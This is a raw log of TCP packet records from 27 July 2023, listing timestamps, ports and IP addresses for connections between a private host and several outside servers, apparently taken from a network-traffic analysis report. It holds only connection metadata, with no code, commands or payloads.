Jul 27, 2023 20:19:00.568090916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568125010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568156004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568186998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568200111 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.568228006 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.568239927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568290949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568322897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568356037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568371058 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.568396091 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.568412066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568444967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568476915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568507910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568521023 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.568546057 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.568562984 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568594933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568627119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568670988 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.569710970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.569746971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.569778919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.569811106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.569828033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.569840908 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.569868088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.569900036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.569912910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.570296049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.574080944 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.582936049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583004951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583053112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583110094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583128929 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.583178997 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.583200932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583250999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583301067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.583408117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583498001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583548069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583595991 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.583621025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.583667994 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.585319996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.585359097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.585393906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586258888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586297989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586318016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.586349010 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.586369038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586405039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586419106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.586452961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586487055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586524010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586534023 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.586565971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586580038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.586612940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586642981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586674929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586689949 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.586710930 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.586735010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586769104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586802006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586834908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586848021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.586877108 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.586891890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586926937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586960077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.586997032 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.587007046 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.587034941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.587049961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.587081909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.587116957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.587150097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.587162971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.587198973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.587208033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.587240934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.588376999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.588454008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.588737965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.588776112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.588793039 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.588826895 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.588860035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.588906050 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.591459990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591506004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591542959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591588020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.591605902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.591620922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591661930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591698885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591716051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.591753960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591793060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591829062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591846943 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.591876030 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.591898918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591953039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.591991901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592030048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592051029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592108965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592123985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592164040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592200994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592240095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592255116 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592309952 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592372894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592412949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592451096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592489004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592504025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592539072 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592562914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592601061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592639923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592678070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592694044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592721939 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592746973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592784882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592820883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592858076 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592873096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592900991 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.592927933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.592964888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.593003035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.593040943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.593058109 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.593091011 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.593110085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.596321106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.596388102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.596425056 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.596482038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.596554995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.605858088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.605940104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.606075048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.606128931 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.606188059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.606234074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.606287003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.606302023 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.606340885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.606367111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.606679916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609457970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609512091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609558105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609611988 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.609641075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609654903 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.609709978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609724998 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.609771013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609817982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609863043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609894991 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.609939098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.609955072 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.609999895 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610045910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610090971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610114098 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.610150099 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.610177040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610220909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610266924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610316992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610330105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.610363007 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.610392094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610435009 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610479116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610527992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610541105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.610575914 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.610601902 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610647917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610691071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610740900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610753059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.610784054 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.610816956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610862017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610903978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610955954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.610970974 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.611005068 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.611032963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.611082077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.611129999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.611182928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.611196041 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.611231089 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.611257076 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.611301899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.611347914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.611398935 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.615405083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615457058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615502119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615545988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615607977 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615626097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.615626097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.615680933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615727901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615772963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615816116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615859985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615881920 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.615881920 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.615931034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.615976095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616054058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616101027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616147995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616192102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616219044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.616219044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.616286039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616344929 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.616499901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616547108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616595030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616650105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.616664886 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.616698027 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.754127979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.773868084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:01.706912994 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:01.723504066 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:01.723622084 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:01.794183969 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:01.810518980 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:01.810640097 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:01.810997009 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:01.811033964 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:01.827143908 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:01.827204943 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:01.932691097 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:01.932725906 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:01.932893991 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:01.944854975 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:01.944854975 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:01.961143970 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:01.961215019 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:02.017115116 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:02.017249107 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:02.017457008 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:02.050151110 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:19:02.050311089 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:19:02.065800905 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:19:02.104188919 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:19:02.119196892 CEST	49695	80	192.168.2.4	89.208.104.62
Jul 27, 2023 20:19:02.517622948 CEST	49696	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:02.517704964 CEST	443	49696	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:02.517960072 CEST	49696	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:02.555321932 CEST	49696	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:02.555360079 CEST	443	49696	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:02.614341021 CEST	443	49696	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:02.615153074 CEST	49696	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:02.634984016 CEST	49696	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:02.635027885 CEST	443	49696	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:02.635677099 CEST	443	49696	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:02.636086941 CEST	49696	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:02.652755022 CEST	49696	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:02.684382915 CEST	443	49696	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:02.684493065 CEST	443	49696	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:02.684788942 CEST	49696	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:02.688637972 CEST	49696	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:02.688680887 CEST	443	49696	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:04.768296957 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:04.768376112 CEST	443	49697	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:04.768500090 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:04.822696924 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:04.822746992 CEST	443	49697	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:04.891212940 CEST	443	49697	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:04.891495943 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:04.923974037 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:04.924019098 CEST	443	49697	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:04.924480915 CEST	443	49697	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:04.927508116 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:04.968341112 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.001549006 CEST	443	49697	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.001641989 CEST	443	49697	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.001699924 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.004543066 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.005224943 CEST	49697	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.005258083 CEST	443	49697	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.141937971 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.196180105 CEST	49695	80	192.168.2.4	89.208.104.62
Jul 27, 2023 20:19:05.406667948 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.406788111 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.409773111 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.454144955 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.454217911 CEST	443	49699	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.454344034 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.520140886 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.520194054 CEST	443	49699	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.581417084 CEST	443	49699	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.581537962 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.581566095 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.596254110 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.596291065 CEST	443	49699	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.596905947 CEST	443	49699	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.596951962 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.599967003 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.639640093 CEST	443	49699	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.639771938 CEST	443	49699	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.639926910 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.674313068 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674475908 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674530983 CEST	80	49698	103.100.211.218	192.168.2.4
